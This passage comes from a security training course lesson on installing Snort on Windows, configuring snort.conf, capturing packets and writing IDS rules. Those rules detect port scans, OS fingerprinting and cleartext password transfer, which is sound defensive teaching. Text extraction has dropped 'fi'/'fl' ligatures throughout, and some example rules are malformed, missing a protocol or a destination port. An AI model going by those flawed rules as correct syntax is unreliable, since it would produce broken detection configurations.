response is not programmed to thwart the attack and if the attack results in
the shutting down of the system running the IDS, then obviously future
attacks cannot be analyzed as well.
What is the reason an IDS cannot provide 100 percent analysis?
While it might be mathematically possible to gather 100 percent of the net-
work traffc and 100 percent of host-based activity, it is unrealistic to expect
the computer to process all of it.
402 Tactical Perimeter Defense
Configuring an IDS
Overview
In this lesson, you will implement IDS. There are many different types of
IDSes, and for this lesson, you will use perhaps the most famous free IDS
toolSnort. Snort is a tool that is designed to monitor TCP/IP networks,
looking for suspicious traffic and direct network attacks. It enables system
administrators to collect enough data to make informed decisions on the best
course of action in the event that an intrusion is detected.
Objectives
To congure IDSs, you will:
8A Describe how Snort works as an IDS.
You will describe how Snort works as an IDS, including the pros and
cons of implementation in a production network environment.
8B Install Snort on a stand-alone computer.
Given a computer running Windows in a networked environment, you
will install the Snort intrusion detection application.
8C Describe the rules used in Snort.
On a computer running Snort, you will create and test a ruleset to check
the effectiveness of the installation.
8D Congure Snort IDS to use a MySQL database.
Given a computer running Windows, you will install MySQL and cong-
ure Snort to send alert data to the database.
8E Congure a full IDS on Linux.
Given a computer running SuSe Linux, you will congure Snort,
MySQL, and the BASE Console to view alerts.
Data Files
Snort_2_6_1_2_Installer
Rules directory
mysql-essential-5.0.27-
win32
adodb493a.tgz
base-1.2.7.tar.gz
Lesson Time
6 hours
LESSON
8
Lesson 8: Conguring an IDS 403
Topic 8A
Snort Foundations
In the world of intrusion detection tools, administrators and analysts have many
choices. One of the choices is cost. Another critical choice is speed of response to
new types of incidents, such as Code Red and the quick follow-up of Code Red
II. It is in this conversation that an open-source tool such as Snort really shines.
This tool and the associated applications that go along with it can be found at
www.snort.org.
The cost issue should be obvious to everyone, and free cant be beat! When
commercial IDS products can be a few thousand dollars on the low end and
over a hundred thousand dollars towards the high end, free is clearly a driv-
ing force for some.
The other primary benet is the fact that the open-source format allows for
fast modications. The rules that Snort uses to make decisions can be made
by anyone and then posted to the web. If a new threat is identied in the
morning, an administrator can create a new rule and post it by that
afternoon. The Snort community can then analyze the rule, and when it is
determined to be correct, the rule can be downloaded and implemented. A
threat can be minimized the very day it is announced. This is a signicant
benet.
Snort Deployment
Snort can be deployed on just about any host on the network. The actual Snort
program is very small and does not use enough resources to cause any signicant
issues with the base operating system. It is possible to install and congure Snort
and let it run for days with no intervention from the administrator. At a later date,
the administrator can view and analyze the data collected.
Although Snort can be installed on almost any host in the network, the choice for
placement is important. Snort uses an interface in promiscuous mode (meaning
that it captures all the packets seen by the NIC), and one installation of Snort per
collision domain might be sufficient. It can also be a benet to have an IDS
placed just inside and just outside of the rewall. This way, you can identify the
attacks that are blocked by the rewall, not just those internal threats.
The interface that is in promiscuous mode is acting as a sniffer, capturing all the
network traffic that the NIC sees. If your network is switched, make sure that you
have at least one host running Snort on each segment. The host itself need not be
an overly powerful machine; however, it is advisable that sufficient disk space be
available to store data and that the processor be able to keep up with analysis of
the packets.
How Snort Works
Snort functions as a network sniffer and logger that can be implemented as a
network-based IDS. (Snort is not a host-based IDS.) Snort uses crafted rules,
which are matched against the packets as they are captured. If the rule matches,
the user-dened action in the rule is executed.
sniffer:
A program to capture data
across a computer network.
Used by hackers to capture
user ID names and
passwords. Software tool that
audits and identies network
trafc packets. Is also used
legitimately by network
operations and maintenance
personnel to troubleshoot
network problems.
404 Tactical Perimeter Defense
Limitations on what the rules can check for are limited by the administrators
imagination and the fact that Snort can only identify TCP, UDP, IP, and ICMP.
There is currently no support for routing protocols.
The types of rules that can be created are therefore quite varied. Examples are
buffer overows, port scanning, network mapping, SMB probes, NetBIOS scans,
and so on.
The way that Snort is able to use such exible rules is due to the way Snort
functions. Snort can look inside a packet and examine its contents. Snort is not
limited to an examination of headers only. This function is called payload
inspection. It is due to this payload inspection that Snort can achieve such ex-
ible rules.
Snort Fundamentals
Snort has four main pieces that combine to provide you with solid IDS
functionality. The rst is the actual packet capture piece, utilizing LibPcap or
WinPcap, where raw packets are pulled off the wire. The second is the preproces-
sor where packets are examined prior to handoff to the actual detection engine.
The third is the actual detection engine. This is where your Snort rules are in
action, with the detection engine looking at the parts of the packets, as you have
dened. Last is the Output piece. If the packet is run through the detection engine
and an alert is generated, or if logging is dened, the Output piece is where that
takes place.
The main le that contains the core Snort conguration is called snort.conf. This
le has several primary parts, some of which you will not make any adjustments
to in this course. Note: If you wish to go into great depth with Snort, you are
recommended to start with the official documentation found at www.snort.org.
The primary parts to the snort.conf le are:
Variables
Preprocessors
Output Plug-ins
Rulesets
There are many variables used in Snort, which then can be referenced later. Some
common variables are var HOME_NET, which is used to dene your local net-
work, and var EXTERNAL_NET, which is used to dene your external network.
Preprocessors are lters used by Snort to perform actions on a packet prior to full
Snort engine. This is useful for speeding up Snort, when preprocessing can
exclude a packet before Snort rules are required to look inside the payload to
perform content and other matching.
Output plug-ins are used by Snort to determine alerting and logging features and
what format to use when Snort is going to dump collected data.
You will dene the location of the rulesets that you wish to use in the snort.conf
le. Although you could write rules into this le, that practice is not encouraged.
By writing individual rule les, you are able to maintain better control over your
conguration. You dene the location of the ruleset in the snort.conf le, and
then the individual rules you require are located in that separate ruleset le.
Lesson 8: Conguring an IDS 405
Prior to running tasks on Snort, you will need to perform some initial
congurations. The rst thing to alter is called the Home Network. This line tells
Snort what your networks IP conguration is, so that Snort will only sniff traffic
on your network, versus all traffic. If you wish to sniff all traffic, you may use a
home network of any.
In this classroom, there are two student networks; the LEFT side uses the 172.16.
10.0/24 network and the RIGHT side uses the 172.18.10.0/24 network. If your
system is part of the LEFT network, you will congure Snort to use this line:
var HOME_NET 172.16.10.0/24. If your system is part of the RIGHT net-
work, you will congure Snort to use this line: var HOME_NET
172.18.10.0/24.
Snort runs on both Linux and Windows platforms, and for this lesson, the tasks
are run on a Windows system. There are other Snort conguration lines that
require editing because you are running on a Windows system. Two of these
other lines are:
include classification.config
include reference.config
These need to be changed to dene the full Snort path on your system. You will
need to change these lines to read as follows:
include C:\Snort\etc\classification.config
include C:\Snort\etc\reference.config
Topic 8B
Snort Installation
Another benet of Snort might be its ease of installation. The overall process of
installation takes only a few minutes. A few more minutes of conguration, and
Snort is up and running.
In this section, you will be installing Snort on a Windows computer, and then
later in the lesson, you will perform a full installation on SuSe Linux. You will
require two things for the installation on Windows:
LibPcap for Windows. You will use a packet capture driver called WinPcap
for this function. (Further WinPcap information is available from the Com-
puter Network and Network Intelligence Group of Politecnico di Torino.)
This simple, self-extracting executable le can be found at www.snort.org
or in other Internet archives.
The Snort application le itself. This is an executable le that can also be
found at www.snort.org.
For tips on loading Snort on
Windows machines, visit
www.silicondefense.com.
406 Tactical Perimeter Defense
TASK 8B-1
Installing Snort
1. If required (you should have installed WinPcap earlier in the course), run
the WinPcap installation le to install the Windows version of the
LibPcap driver. Note that the lename is WinPcap_4_0.exe.
2. From the C:\Tools\Lesson8 folder, double-click the Snort installer le. The
full lename is Snort_2_6_1_2_Installer.exe.
3. Read the License Agreement, and if you agree, click the I Agree button
to continue the installation.
4. Keep the I Do Not Plan To Log To A Database radio button selected and
click Next. Note that later in the lesson you will work with a MySQL
database.
5. Keep all the default selected components checked, and click Next.
6. Accept the default install location, and click Next.
7. When the install is complete, click Close to exit the Setup program.
8. In the successful install window, click OK. If you get a pop-up about
WinPcap, click OK.
9. Open My Computer, and navigate to the C:\Snort folder. Note the direc-
tory structure that was created during the install:
C:\Snort\bin
C:\Snort\contrib
C:\Snort\doc
C:\Snort\etc
C:\Snort\lib
C:\Snort\log
C:\Snort\rules
C:\Snort\schemas
10. In the C:\Snort\bin folder, create a folder named log (this will have a path
of C:\Snort\bin\log).
11. In the C:\Snort\log folder (note this is not the folder created in Step 10), cre-
ate a le named alert.ids and click Yes to accept that you are going to
change the le name extension. You will need this le later in the lesson.
12. Choose StartAdministrative ToolsServices.
13. Scroll to the Messenger service.
14. Right-click the Messenger service and choose Properties.
15. Change the Startup type to Automatic.
It is a good idea for the
students to save current
versions of their snort.conf
le during this lesson. If an
error occurs, they only
have to go back the last
known good le.
Lesson 8: Conguring an IDS 407
16. Click Apply.
17. Click Start.
18. Click OK.
19. Close the Services window.
Common Snort Commands
When running Snort, there are some common switches and commands you should
be aware of. In this course, you will not use all of these, but will use the most
common ones. These switches include:
-v.: This is the basic command, putting Snort in packet sniffing mode.
-d: This is the command to display IP, TCP, ICMP, and UDP headers.
-e: This is the command to display the packet data along with the headers.
-l: This is the command to enable logging. After the -l command, you must
dene the location of the logs.
-c: This command is what essentially turns on the IDS of Snort, versus run-
ning it as a packet sniffer. After the -c command, you must dene the
location of the rules le that Snort is to use for IDS functions.
-W: This command will list the network interfaces that are available to
Snort.
-iX: This command will tell Snort which network interface to use when you
replace the X variable with the number of the network interface.
TASK 8B-2
Initial Snort Configuration
1. Open My Computer and navigate to the C:\Snort\etc folder.
2. Right-click the snort.conf le, and choose Copy.
3. Right-click in the C:\Snort\etc folder and choose Paste.
4. Rename the copy of snort.conf le as snort.conf.bak. (Click Yes, if you
receive a Rename warning prompt.) In the event that you run into difficulty
with your snort.conf le, you will have this le as a backup.
5. Double-click the original snort.conf le.
6. Select the Select The Program From A List radio button and click OK.
7. Select WordPad as the program to use and click OK. You may leave the
check box checked to always use this program to open this le type.
When editing Snort lines, be
sure you edit the actual lines
used, not the lines that are
designated with a #
comment.
408 Tactical Perimeter Defense
8. Scroll down to var HOME_NET any and replace any with your home
network.
If you are in the LEFT network, use: var HOME_NET
172.16.0.0/16
If you are in the RIGHT network, use: var HOME_NET
172.18.0.0/16
9. Search for the variable var EXTERNAL_NET any and change it to
read var EXTERNAL_NET !$HOME_NET
10. Search for the variable include classification.config and
change it to read include
C:\Snort\etc\classification.config
11. Search for the variable include reference.config and change it
to read include C:\Snort\etc\reference.config
12. Search for the variable var RULE_PATH ../rules and change it to
read var RULE_PATH C:\Snort\rules
13. Change # include threshold.conf to read include
C:\Snort\etc\threshold.conf
14. There are two other lines where you must replace the default line to a spe-
cic Windows path. The following two steps show the before and after of
these two conguration lines.
15. Change dynamicpreprocessor directory
/usr/local/lib/snort_dynamicpreprocessor/ to read
dynamicpreprocessor directory
C:\Snort\lib\snort_dynamicpreprocessor
16. Change dynamicengine
/usr/local/lib/snort_dynamicengine/libsf_engine.so to
read dynamicengine
C:\Snort\lib\snort_dynamicengine\sf_engine.dll
17. Once you have made these changes, save and close the snort.conf le.
18. Open two command prompts. One will be used to run Snort and the other
to run ping commands.
19. At one of the command prompts, navigate to the C:\Snort\bin folder, and
enter snort -W
You will see a list of available adapters on which you could install the
sensor. The adapters are numbered 1, 2, 3, and so forth. In this lesson, you
will be using the NIC. Write the number associated to that adapter here:
_______
20. At the C:\Snort\bin prompt, enter snort -v -iX where X is the number
of the NIC that you recorded in the previous step.
21. Switch to your other open command prompt, and ping any other com-
puter in the network. When the ping is complete, switch back to the
command prompt that is running Snort.
Lesson 8: Conguring an IDS 409
22. In the Snort command prompt, press Ctrl+C to stop Snort.
23. Review the summary information, noting the packets that Snort cap-
tured in this test.
24. Close all open windows.
Using Snort as a Packet Sniffer
In our rst example of working with Snort, you will use it for packet sniffng.
Using a command prompt, you will capture headers. This can produce a lot of
information quickly, so make sure that you change the buffer size of the com-
mand prompt to a very high value; even 5000 or more is ne. An example of
packet sniffing by Snort is shown in Figure 8-1.
Figure 8-1: An example of Snort being turned on as a packet sniffer.
About the Tasks
For many of the activities in this topic, you will work in pairs. Each student com-
puter should have two command prompt windows open: one for running Snort
commands and the other for running pings and other network commands. Your
instructor will designate one student in each pair to act as Host One; the other
will be Host Two. Remember which is which, and only perform those steps that
apply to your specic machine.
packet sniffer:
A device or program that
monitors the data traveling
between computers on a
network.
410 Tactical Perimeter Defense
TASK 8B-3
Capturing Packets with Snort
Setup: Snort has been installed and tested, and your instructor has
designated you as Host One or Host Two.
Note: Perform the following step on all student computers.
1. Open two command prompts.
Note: Perform the following step only if you are designated as Host One.
2. Change to the c:\snort\bin directory. Enter snort -v -ix (remember
to use the adapter number in place of the x). The -v switch prints the head-
ers on the screen.
Note: Perform the following step only if you are designated as Host Two.
3. As soon as Host One has pressed Enter, ping Host One by its IP address.
Note: Perform the following step only if you are designated as Host One.
4. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Leave the used windows open, and switch to the unused command
prompt.
Note: Perform the following step only if you are designated as Host Two.
5. Switch to the unused command prompt. Change to the c:\snort\bin
directory. Enter snort -v -ix (remember to use the adapter number in
place of the x).
Note: Perform the following step only if you are designated as Host One.
6. As soon as Host Two has pressed Enter, ping Host Two by its IP
address.
Note: Perform the following step only if you are designated as Host Two.
7. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Note: Perform the following step on all student computers.
8. Minimize the command prompt window used for pinging, and focus on
the window in which Snort was running. Browse the le, and try to
identify the ping packets sent between Host One and Host Two.
Packet Data Capture
When Snort is rst stopped, it lists some statistics about the capturing session that
just ended. This statistical analysis is for a quick overview of the kinds of traffic
that were captured, and it looks like Figure 8-2.
Lesson 8: Conguring an IDS 411
Figure 8-2: An example of the statistics after a packet capture has completed.
In this example, no packets were dropped, and the vast majority of packets cap-
tured were TCP. This screenshot was generated on a Windows 2000 computer,
after running for about 20 seconds in a controlled environment.
Figure 8-3 shows a portion of the packet headers that were captured, specically
the ping packets. This is what the goal of the previous exercise wasto identify
the ping packets. From this screenshot, you can identify that the ping initiated
from host 10.0.10.115 and was sent to 10.0.10.213.
You should be able to see that the packets were correctly identied as ICMP, and
the ID numbers are going up as expected: 2635 on the rst request shown, 2636
on the second, and so on. The reply packets also follow the ICMP rules: ID
53820 followed by 53821. The sequence numbers are also correct, again
incrementing by one, as expected.
412 Tactical Perimeter Defense
Figure 8-3: An example of a ping sequence between two hosts captured by Snort.
Although the capture of header information is an excellent way to craft the IDS
for an organization, more might be required, such as examining the contents of
packets and determining if the content matches any rule. If this is the case, then
another switch is needed to see the packet data in Snort. The switch to add is the
-d switch.
TASK 8B-4
Capturing Packet Data with Snort
Note: Perform the following step only if you are designated as Host One.
1. If necessary, change to the directory where you installed Snort. Remem-
ber, the directory is c:\snort\bin. Enter snort -ix -v -d.
Using the -d switch enables you to see the packet data in Snort.
Note: Perform the following step only if you are designated as Host Two.
2. As soon as Host One has pressed Enter, ping Host One by its IP address.
Note: Perform the following step only if you are designated as Host One.
3. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Leave this window open, and switch to the other command prompt.
Note: Perform the following step only if you are designated as Host Two.
4. Switch to the other command prompt. If necessary, change to the direc-
tory where you installed Snort. Enter snort -ix -v -d.
Dont forget, the x in the
switch -ix is the number of
your network interface.
Lesson 8: Conguring an IDS 413
Note: Perform the following step only if you are designated as Host One.
5. As soon as Host Two has pressed Enter, ping Host Two by its IP
address.
Note: Perform the following step only if you are designated as Host Two.
6. As soon as the ping is completed, press Ctrl+C to stop the packet capture.
Note: Perform the following step on all student computers.
7. Minimize the command prompt that you used for pinging, and focus on
the window in which Snort was running. Browse the le, and try to
identify the ping packets sent between Host One and Host Two. Because
the contents of the packet are captured this time, the screen looks different.
You should still be able to identify the ping sequence, though. The difference
that should be obvious is the payload data itself. Because the data is ping,
the payload is lled with paddingin this case, letters from the English
alphabet.
In both command prompt windows, use the cls command to clear the
screen and prepare for the next task.
Logging with Snort
Using packet capture enables the security professional to gather data to look for
misuse of resources and network intrusions. However, it is impractical to expect
anyone to watch the screen for intrusions, not to mention that the speed at which
the packets are captured is quite fast (as you might have already seen).
It is much more logical to record these packets to the hard drive for future
analysis. The process is pretty simpleprovide a log directory and tell Snort to
perform logging. If you start the Snort program, telling it to log, and there is no
such directory, Snort will exit with an error.
Snort is designed to create a folder hierarchy of the packets it captures. The
folder structure in the log directory uses IP addresses for simple searching at a
later time.
TASK 8B-5
Logging with Snort
Setup: Two clean command prompt windows are open.
Note: Perform the following step only if you are designated as Host One.
1. If necessary, change to the directory where you installed Snort. Enter
snort -ix -dev -l \snort\log to start Snort and instruct it to
record headers and data in the \snort\log folder.
Note: Perform the following step only if you are designated as Host Two.
414 Tactical Perimeter Defense
2. Ping Host One by its IP address.
Note: Perform the following step only if you are designated as Host One.
3. Switch to the other prompt, and ping Host Two by its IP address.
Note: Perform the following step only if you are designated as Host Two.
4. Change to the directory where you installed Snort, and enter snort
-ix -dev -l \snort\log to start Snort and instruct it to record
headers and data in the \snort\log folder.
Note: Perform the following step only if you are designated as Host One.
5. Ping Host Two by its IP address.
Note: Perform the following step only if you are designated as Host Two.
6. Ping Host One by its IP address.
Note: Perform the rest of this task on all student computers.
7. Press Ctrl+C to stop Snort.
8. Start Windows Explorer, and navigate to the snort\log folder.
9. Locate your log le, it will have a name such as snort.log.116850130.
10. Choose StartAll ProgramsWiresharkWireshark.
11. Choose FileOpen.
12. Navigate to your new log le and click Open.
13. Review the packet capture, and compare what was captured with the
ping commands you sent between you and your partner.
14. Close all windows.
Topic 8C
Snort as an IDS
Up to this point, you have been using Snort to capture packets and then examin-
ing the contents of those packets. Although this can be quite useful, it is not a
practical way to deploy an IDS. An IDS needs rules to follow and a way to alert
the administrator when a rule is matched. In this topic, you will take Snort to the
next level: IDS.
Lesson 8: Conguring an IDS 415
Its All in the Rules
As stated earlier, Snort uses rules to match for signatures of misuse. These rules
can be created or modied for use as they come in the application. You will look
at both scenarios.
An example of the syntax to use Snort as an IDS is as follows:
%systemroot%\snort\snort -dev -l \snort\log -c snort.conf
In this example, the new addition to the line is the -c switch, followed by the
snort.conf le. As you might remember, the snort.conf le is used to dene con-
guration variables that will be used for Snort. Earlier, all that the snort.conf le
was used for was to specify the Home_Net variable by changing it to refer to the
correct IP address.
In this case, adding the -c switch tells Snort to apply the rules that are in the
snort.conf le to the packets as they are processed by Snort. Before we get too
far ahead of ourselves, lets back up and look at the basics of the Snort rules. The
rules of Snort are made up of two distinct parts:
Rule Header: The Rule Header is where the rules action, protocol, direc-
tional operator, source and destination IP addresses (with subnet mask), and
the source and destination ports are identied.
Rule Options: The Rule Options are where the rules alert messages and
specications on what parts of the packet are to be matched to determine if
there is a rule match.
Here is an example rule:
alert tcp any any -> any 80 (content: "adult"; msg: "Adult
Site Access";)
The syntax breakdown of this example is as follows:
The text up to the rst parenthesis is the Rule Header.
The section enclosed inside the parentheses are the Rule Options. Rule
Options are not required by any rule, but they provide much information and
might be the reason for creating the rule itself.
So, the end result of this rule is to create an alert if TCP traffic from any IP
address and any port is sent to any host at port 80, where the word Adult is in the
payload. If this rule is met, a message of Adult Site Access will be placed in the
logs with this packet.
The Rule Header
Lets look at the Rule Header in more detail. As mentioned previously, the Rule
Header for our example is composed of the following information:
alert tcp any any -> any 80
The rst part of this syntax, alert, is known as a rule action. The rule actions
in the header denes what is to be done when a packet that matches the rule is
found. There are ve actions that can be dened.
Rule Action Description
Alert Creates an alert using whatever method has been
dened. Also logs the packet using whatever
method has been dened.
The symbol represents
that all code shown belongs
on the same line. It is shown
here on more than one line
due to margin constraints.
416 Tactical Perimeter Defense
Rule Action Description
Log Logs the packet using whatever method has been
dened.
Pass Tells Snort to ignore this packet.
Activate Creates an alert and turns on a dynamic rule.
Dynamic Remains unused unless another rule calls it. If
called, it acts similarly to a log rule.
After the action has been dened, the next step is to dene the protocol. In our
example, the protocol dened is TCP. Currently, Snort supports dening the TCP,
UDP, ICMP, and IP protocols.
After the action and protocol are dened, Snort requires the IP addresses to be
used. A valid statement is to use the word any, meaning any IP address. Snort
uses the netmask format of specifying the subnet mask. Following this, a full
Class A IP address will have a netmask of /8, a full Class B will have a netmask
of /16, and a full Class C will have a netmask of /24. Single hosts might be
specied with a /32 netmask.
In addition to dening a single host or a single subnet of addresses, Snort can
work with groups of IP addresses in a single rule. This is called creating an IP
list. The IP list can be created by enclosing the list, with addresses separated by
commas, in square brackets. An example of using an IP list is:
Alert tcp any any -> [10.0.10.0/24, 10.10.10.0/24] any
(content: "Password"; msg:"Password Transfer Possible!";)
Note: Although the previous line is split in two lines, in the editor it can be entered
as a long line. Versions of Snort, pre-1.8, required a slash symbol (\) between lines
of a single rule. It is acceptable now to have a rule span multiple lines, but in most
editors, a long line is easy to work with.
After IP addresses have been specied, you need to tell Snort which port you
want to check. When you are working with Snort rule syntax, ports can be
dened in several ways. Single static ports are common, as in port 80, port 23,
and so on. The rule can also dene the keyword any, again meaning any port.
Ranges of ports can also be dened using a colon to separate the start and end
points of the range. Here are several examples of different port denitions:
To log any traffic from any IP address and any port to port 23 of the 10.0.
10.0/24 network:
Log tcp any any -> 10.0.10.0/24 23
To log any traffic from any IP address to any port between (and including) 1
and 1024 on any host in the 10.0.10.0/24 network:
Log tcp any any -> 10.0.10.0/24 1:1024
To log any traffic from any IP address where the port number is less than or
equal to 1024 and is destined for any host in the 10.0.10.0/24 network with
a destination port equal to and greater than 1024:
Log tcp any :1024 -> 10.0.10.0/24 1024:
Lesson 8: Conguring an IDS 417
In the rules of Snort, there is an option to negate a port or IP address. By using
the exclamation point (!), the rule will perform a negate. This is similar to the
negate option in the IPTables rulesets. For example:
To log any tcp traffic from any host other than 172.16.40.50 using any port
to any host on the 10.0.10.0/24 network using any port:
Log tcp ! 172.16.40.50/32 any -> 10.0.10.0/24 any
To log any tcp traffic from any host using any port to the 10.0.10.0/24 net-
work to any port other than 23:
Log tcp any any -> 10.0.10.0/24 !23
By now, through these examples you should be able to identify the directional
option. The direction is dened with ->. This means coming from the left and
going to the right, so to speak. It is possible to have Snort check the packet for
IP addresses and ports in both directions. This can be a benet for analysis of
both sides of a session. The following example uses the bi-directional option to
record both ends of a telnet session:
Log tcp 10.0.10.0/24 any <> 172.16.30.0/24 23
The Rule Options
Where Snort can really start to show its exibility and function is in the Rule
Options. All of the Rule Options are separated by using a semicolon (;). Rule
Option keywords are separated from their arguments with a colon (:). The follow-
ing table lists some of the available keywords.
Keyword Description
msg Prints a message, as dened in the alert and packet logs.
ttl Used to match the IP headers Time To Live value.
id Used to match a specic IP header fragment value.
flags Used to match tcp ags for dened values.
ack Used to match the TCP ack setting for a dened value.
content Used to match a dened value in a packets payload.
There are more keywords. It is advisable that you check the man pages (if you
are using a Linux box) or the Help pages (if you are using a Windows box) for
the remaining list of keywords.
When the msg option is used in a rule, it tells the logging and alerting engine
that there is a message that should be inserted along with a packet dump or in an
alert. Here is a sample syntax for the msg option:
msg: "text here";
When the ttl option is used in a rule, it tells Snort that there is a specic Time To
Live value to match. Only successful on an exact match, this can be useful for
detecting traceroute attempts. Here is a sample syntax for the ttl option:
ttl: "time-value";
When the id option is used in a rule, it tells Snort to match an exact value in the
IP header Fragment eld. Here is a sample syntax for the id option:
id: "id-value";
418 Tactical Perimeter Defense
For the ags option, there are several suboptions, which include the ags that can
be matched. The ags are dened in the rule by their single letter, as listed here:
F for FIN
S for SYN
R for RST
P for PSH
A for ACK
U for URG
2 for Reserved bit 2
1 for Reserved bit 1
0 for no tcp ags set
The standard logical operators are also valid for ags: the + for matching all
ags, the * for matching any ag, and the ! for matching all except the dened
ag. The reserved bits can be used to detect scans or IP stack ngerprinting. Here
is a sample syntax for the ags option:
flags: value(s);
The following rule example shows a syntax that could be used to detect SYN-
FIN scans:
Alert any any -> 10.0.10.0/24 any (flags: SF; msg: "SYN FIN
Scan Possible";)
When the ack option is used in a rule, it tells Snort to match a specic ACK
value in the TCP header of a packet. The network mapping tool Nmap uses the
ACK ag to determine if a remote host is active. Here is a sample syntax for the
ack option:
ack: "ack-value";
The content keyword might be the most important keyword that Snort has
available. When you use this option in a rule, it enables Snort to examine the
payload of a packet and perform checks against the contents based on this
keyword. Snort uses a pattern-match function called Boyer-Moore. (This match-
ing function can be more intense than all the other options, so take care not to
overuse this option on slower machines.) This rule is case-sensitive, so matching
the word Test and the word test are two different things.
The complexity of this option comes into play with the denition of the data for
the match. Although it can be entered in plaintext, it can also be entered as mixed
binary bytecode. (Bytecode data is a hexadecimal representation of binary data.)
The basic syntax of this option is similar to the other options:
content:"content value";
Simple Rule Examples
This section details several rule examples, followed by brief descriptions of their
functions. You can use these as a template for creating your own simple rules.
To log all traffic trying to connect to the telnet port:
Lesson 8: Conguring an IDS 419
Log tcp any any -> 10.0.10.0/24 23
To log ICMP traffic towards the 10.0.10.0 network:
Log icmp any any -> 10.0.10.0/24 any
To allow all web browsing to go through without logging:
Pass tcp any 80 -> any 80
To create an alert with a message:
Alert tcp any any -> any 23 (msg: "Telnet Connection
Attempt";)
To nd SYN/FIN scans of the network:
Alert tcp any any -> 10.0.10.0/24 any (msg: "SYN-FIN
scan detected"; flags: SF;)
To nd TCP NULL scans of the network:
Alert tcp any any -> 10.0.10.0/24 any (msg: "NULL scan
detected"; flags: 0;)
To nd attempts at OS ngerprinting:
Alert tcp any any -> 10.0.10.0/24 (msg: "O/S Fingerprint
detected"; flags: S12;)
To perform content ltering:
alert tcp any $HOME_NET -> !$HOME_NET any (content:
"Hello"; msg:"Hello Packet";)
Now that you have looked at several example rules, lets put them together and
create a ruleset for Snort.
Snort Rule IDs
An option was added to Snort to categorize all the various Snort rules. This
allows for people from all over the ability to use the same number for their rules,
and it helps keep the rules organized. There are a few ranges of the Snort ID that
you need to be aware of. These ranges are:
Less than 100: Reserved for future Snort use.
101 through 1,000,000: Reserved for direct Snort.org distribution rules.
1,000,001 and greater: These numbers are for the custom local rules.
A great resource called www.bleedingsnort.com uses rules in the 2,000,000
range. When you develop your own local rules, as long as you use a unique num-
ber for every rule, and that number is greater than one million, your rule will not
have a SID problem. However, it is a good idea to use a higher number such as
four million and up, because organizations who write rules, such as Bleeding
Snort, might be in the lower ranges.
Even when using ICMP,
Snort requires ports to be
dened, so use the word any.
This example uses the
Home_Net variable instead
of dening the IP address.
420 Tactical Perimeter Defense
TASK 8C-1
Creating a Simple Ruleset
Objective: To create a rule that logs all TCP traffic, alerts to ping, and
alerts to the use of the word password.
1. Open Notepad and enter the following:
log tcp any any <> any any (msg: "TCP Traffic Logged";
sid:10000001;)
alert icmp any any <> any any (msg: "ICMP Traffic Alerted";
sid: 10000002;)
alert tcp any any <> any any (content: "password"; msg:
"Possible Password Transmitted"; sid:10000003;)
2. Save the le as C:\Snort\rules\myrule.rules and close Notepad. Be sure
to type the quotes so that Windows will not assign a le name extension,
keeping rules as the extension.
Testing a Rule Set
After you have created a ruleset and have saved it in the Snort folder, it is time
to test this ruleset. You can do so at the command prompt. Just be sure that the
command prompt buffer is set high enough.
TASK 8C-2
Testing the Ruleset
Note: Perform the following step on all student computers.
1. Clear the \snort\log folder and open two command prompts. If you want
to save the old logs to another location, go ahead and do so.
Note: Perform the following step only if you are designated as Host One.
2. If necessary, change to the directory where you installed Snort. Enter
snort -d -e -v -iX -c \Snort\rules\myrule.rules -l
\Snort\log to run Snort using the new ruleset.
Note: Perform the following step only if you are designated as Host Two.
3. Once Host One is running Snort, ping Host One by its IP address. Then,
enter net send [ip_address] Here is my password
In this case, [ip_address] is the IP address of your partners computer.
Note: Perform the following step only if you are designated as Host One.
4. When you receive the message, click OK, and then stop Snort by pressing
Ctrl+C.
Due to space constraints,
code appearing with the
character at the end of the
line should appear on one
line in Notepad.
Lesson 8: Conguring an IDS 421
Note: Perform the following step only if you are designated as Host Two.
5. If necessary, change to the directory where you installed Snort. Enter
snort -d -e -v -iX -c \Snort\rules\myrule.rules -l
\Snort\log to run Snort using the new ruleset.
Note: Perform the following step only if you are designated as Host One.
6. Once Host Two is running Snort, ping Host Two by its IP address. Then,
enter net send [ip_address] Here is my password
In this case, [ip_address] is the IP address of your partners computer.
Note: Perform the following step only if you are designated as Host Two.
7. When you receive the message, click OK, and stop Snort by pressing
Ctrl+C.
Note: Perform the following step on all student computers.
8. Examine the log les for the alerts and logs that were generated. Compare
them to the ruleset and your scan from earlier. Then, close all open
windows.
9. To look at the alert data that was generated, right-click the alert.ids le,
open it with WordPad, and examine the alert.
More Rule Options
Up to this point, you have seen very simple rules, and while these are good for
getting used to Snort, the example rules so far have been very limited. Snort can
work with much more complex rulesets, and as you will see in the following sec-
tion; the only limitation is your imagination and knowledge of your environment.
As discussed, the Snort rule is broken into two primary parts, the header and the
options. Where the header details the IP, port number, direction, and so on, the
options are where you can get very specic with the rule. There are many choices
of what you can place in the options part of the rule, and for the context of this
lesson, you will examine two of them: Metadata Options and Payload Detection
Options.
422 Tactical Perimeter Defense
Metadata Options
Metadata Options are where you detail characteristics about the rule. One
example of a Metadata Option is the Message (msg), which you looked at previ-
ously in this lesson. Another example is the Snort Rule ID (sid). You could also
dene a reference URL for more information about the event. Here is a quick list
of Metadata Options:
msg:: This option is used to insert a message in human-readable language.
sid:: This option is used to dene the unique Snort Rule ID for the specic
rule.
classtype:: This option is used to classify the specic type of event.
priority:: This option is used to dene the priority level of the event.
reference:: This option is used to dene a reference URL for more infor-
mation about the event.
rev:: This option is used to dene a revision number to the rule.
Classtypes
Classtype and priority level can go together, with the classication of an event
being tied to a priority level. There are three default levels of priority (low,
medium, and high), but you are able to dene these further using the priority:
option in your rule. The default priorities have a numeric value of 1 (high), 2
(medium), and 3 (low).
The Classtype is used to categorize events. There are many precongured
classtypes, and these are assigned to one of the three default priority levels. The
following table details some of the default classtypes
Classtype Description Priority
Attempted-admin Attempted administrator privilege gain. High
Attempted-user Attempted user privilege gain. High
Shellcode-detect Executable code was detected. High
Successful-admin Successful administrator privilege gain. High
Trojan-activity A network Trojan was detected. High
Web-application-attack Web application attack. High
Attempted-recon Attempted information leak. Medium
Suspicious-login An attempted login using a suspicious
user name detected.
Medium
Successful-dos Denial-of-service attack. Medium
Unusual-client-port-connection A network client was using an unusual
port.
Medium
Icmp-activity Generic ICMP event. Low
Network-scan Detection of a network scan. Low
Here is an example rule with the addition of these new options:
Alert tcp $EXTERNAL_NET any -> 192.168.10.1 80
(msg:"Sample web access alert";
classtype:web-application-activity;
reference:url,http://www.securitycertified.net;
sid:10000023; rev:2;)
Lesson 8: Conguring an IDS 423
